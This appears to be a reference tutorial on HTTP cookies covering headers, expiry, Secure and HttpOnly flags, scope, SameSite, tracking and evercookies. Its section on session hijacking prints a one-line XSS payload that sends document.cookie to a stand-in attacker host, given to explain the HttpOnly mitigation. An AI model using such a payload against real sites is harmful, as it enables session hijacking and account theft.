An HTTP cookie (web cookie, browser cookie) is a small piece of data that a server sends
    to the user's web browser. The browser may store it and send it back with the next
    request to the same server. Typically, it's used to tell if two requests came from
    the same browser — keeping a user logged-in, for example. It remembers stateful
    information for the stateless HTTP protocol.

Cookies are mainly used for three purposes:
    * Session management
        Logins, shopping carts, game scores, or anything else the server should remember.
    * Personalization
        User preferences, themes, and other settings.
    * Tracking
        Recording and analyzing user behavior.

Cookies are sent with every request, so they can worsen performance
    (especially for mobile data connections).
Modern APIs for client storage are the Web storage API
    (localStorage and sessionStorage) and IndexedDB.

* Creating cookies
    When receiving an HTTP request, a server can send a Set-Cookie header with the response.
    The cookie is usually stored by the browser, and then the cookie is sent with requests
    made to the same server inside a Cookie HTTP header. An expiration date or duration can
    be specified, after which the cookie is no longer sent.

* The Set-Cookie and Cookie headers
    The Set-Cookie HTTP response header sends cookies from the server to the user agent.
    A simple cookie is set like this:
        Set-Cookie: <cookie-name>=<cookie-value>
    Now, with every new request to the server, the browser will send back all previously
    stored cookies to the server using the Cookie header.
        GET /sample_page.html HTTP/1.1
        Host: www.example.org
        Cookie: yummy_cookie=choco; tasty_cookie=strawberry
    
* Session cookies
    The cookie created above is a session cookie: it is deleted when the client shuts down,
    because it didn't specify an Expires or Max-Age directive. However, web browsers may
    use session restoring, which makes most session cookies permanent, as if the browser
    was never closed.

* Permanent cookies
    Instead of expiring when the client closes, permanent cookies expire at a specific
    date (Expires) or after a specific length of time (Max-Age).
        Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;
    ! Note: When an expiry date is set, the time and date set is relative to the client
    the cookie is being set on, not the server.

* Secure and HttpOnly cookies
    A secure cookie is only sent to the server with a encrypted request over the HTTPS
    protocol. Even with Secure, sensitive information should never be stored in cookies,
    as they are inherently insecure and this flag can't offer real protection. Starting
    with Chrome 52 and Firefox 52, insecure sites (http:) can't set cookies with
    the Secure directive.
    To prevent cross-site scripting (XSS) attacks, HttpOnly cookies are inaccessible
    to JavaScript's Document.cookie API; they are only sent to the server. For example,
    cookies that persist server-side sessions don't need to be available to JavaScript,
    and the HttpOnly flag should be set.
        Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

* Scope of cookies
    The Domain and Path directives define the scope of the cookie: what URLs the
    cookies should be sent to.
    Domain specifies allowed hosts to receive the cookie. If unspecified, it
    defaults to the host of the current document location, excluding subdomains.
    If Domain is specified, then subdomains are always included.
    For example, if Domain=mozilla.org is set, then cookies are included on
    subdomains like developer.mozilla.org.
    Path indicates a URL path that must exist in the requested URL in order to
    send the Cookie header. The %x2F ("/") character is considered a directory
    separator, and subdirectories will match as well.
    For example, if Path=/docs is set, these paths will match:
        /docs
        /docs/Web/
        /docs/Web/HTTP

* SameSite cookies 
    SameSite cookies let servers require that a cookie shouldn't be sent with cross-site
    requests, which somewhat protects against cross-site request forgery attacks (CSRF).
    SameSite cookies are still experimental and not yet supported by all browsers.

* JavaScript access using Document.cookie
    New cookies can also be created via JavaScript using the Document.cookie property,
    and if the HttpOnly flag is not set, existing cookies can be accessed from
    JavaScript as well.
        document.cookie = "yummy_cookie=choco";
        document.cookie = "tasty_cookie=strawberry";
        console.log(document.cookie);
        // logs "yummy_cookie=choco; tasty_cookie=strawberry"
    
* Session hijacking and XSS
    Cookies are often used in web application to identify a user and their authenticated
    session, so stealing a cookie can lead to hijacking the authenticated user's session.
    Common ways to steal cookies include Social Engineering or exploiting an XSS
    vulnerability in the application.
        (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
    The HttpOnly cookie attribute can help to mitigate this attack by preventing access
    to cookie value through JavaScript.

* Tracking and privacy
    Third-party cookies
        Cookies have a domain associated to them. If this domain is the same as the domain
        of the page you are on, the cookies is said to be a first-party cookie. If the
        domain is different, it is said to be a third-party cookie. While first-party
        cookies are sent only to the server setting them, a web page may contain images
        or other components stored on servers in other domains (like ad banners).
        Cookies that are sent through these third-party components are called third-party
        cookies and are mainly used for advertising and tracking across the web.
    Do-Not-Track
        There are no legal or technological requirements for its use, but the DNT header
        can be used to signal that a web application should disable either its tracking
        or cross-site user tracking of an individual user.

* Zombie cookies and Evercookies
    A more radical approach to cookies are zombie cookies or "Evercookies" which are
    recreated after their deletion and are intentionally hard to delete forever.
    They are using the Web storage API, Flash Local Shared Objects and other
    techniques to recreate themselves whenever the cookie's absence is detected.



